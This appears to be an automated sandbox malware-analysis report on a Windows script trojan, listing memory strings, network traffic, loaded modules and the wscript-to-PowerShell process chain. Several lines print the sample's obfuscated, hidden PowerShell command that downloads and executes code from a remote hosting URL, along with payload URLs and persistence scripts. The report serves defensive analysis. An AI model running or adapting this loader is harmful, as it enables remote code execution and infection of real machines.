Source: wscript.exe, 00000000.00000003.1405432057.00000280F3924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405497688.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1408967806.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407883975.00000280F3922000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010)
Source: wscript.exe, 00000000.00000003.1399962901.00000280F38AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1408812843.00000280F3899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407971588.00000280F3898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010L6
Source: wscript.exe, 00000000.00000003.1405432057.00000280F3924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405497688.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010LMEM
Source: wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010Q
Source: wscript.exe, 00000000.00000003.1405432057.00000280F3924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405497688.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010T
Source: wscript.exe, 00000000.00000003.1403020097.00000280F570A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407515414.00000280F570A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407682045.00000280F570A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402939541.00000280F56F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1403138772.00000280F570A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402220554.00000280F56C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1409135602.00000280F570A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010https://bitbucket.or
Source: wscript.exe, 00000000.00000003.1399962901.00000280F38AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1408812843.00000280F3899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407971588.00000280F3898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010o6
Source: wscript.exe, 00000000.00000003.1405432057.00000280F3924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405497688.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/xyz491/nj/raw/96b799862262a697104adc829df7fe0911fb41a9/010w
Source: wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
Source: powershell.exe, 00000003.00000002.1647087611.0000018DE6181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1647087611.0000018DE6181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1647087611.0000018DE6181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: wscript.exe, 00000000.00000003.1402328512.00000280F57C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399862238.00000280F57BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD6332000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD6332000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://honeydew-raven-308531.hostingersite.com
Source: powershell.exe, 00000003.00000002.1625600487.0000018DD7481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://honeydew-raven-308531.hostingersite.com/moa/
Source: wscript.exe, 00000000.00000003.1407971588.00000280F3907000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1408812843.00000280F3907000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1402374098.00000280F3907000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399915139.00000280F3907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: powershell.exe, 00000003.00000002.1647087611.0000018DE6181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407883975.00000280F3922000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1407883975.00000280F3922000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405841811.00000280F3925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: wscript.exe, 00000000.00000003.1399802730.00000280F3925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399862238.00000280F57C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.9:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 84.32.84.136:443 -> 192.168.2.9:49777 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.9:49834 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49840 version: TLS 1.2

System Summary

barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Documents\Visuals\VcEffect.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Documents\Visuals\VcTurnOff.ps1"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Documents\Visuals\VcEffect.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Documents\Visuals\VcTurnOff.ps1" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C417583_2_00007FF886C41758
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C4B0EC3_2_00007FF886C4B0EC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C4B1753_2_00007FF886C4B175
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C412F33_2_00007FF886C412F3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886D035D93_2_00007FF886D035D9
Source: FmmYUD4pt7.wsfInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal100.troj.expl.evad.winWSF@13/12@4/4
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\010[1].txtJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fzech3tv.thg.ps1Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Documents\Visuals\VcEffect.bat" "
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\ProgramData\Documents\Visuals\VcTurn.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FmmYUD4pt7.wsf"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\ProgramData\Documents\Visuals\VcTurn.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Documents\Visuals\VcEffect.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Documents\Visuals\VcTurnOff.ps1"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Documents\Visuals\VcTurnOff.ps1"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Documents\Visuals\VcEffect.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Documents\Visuals\VcTurnOff.ps1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Documents\Visuals\VcTurnOff.ps1" Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
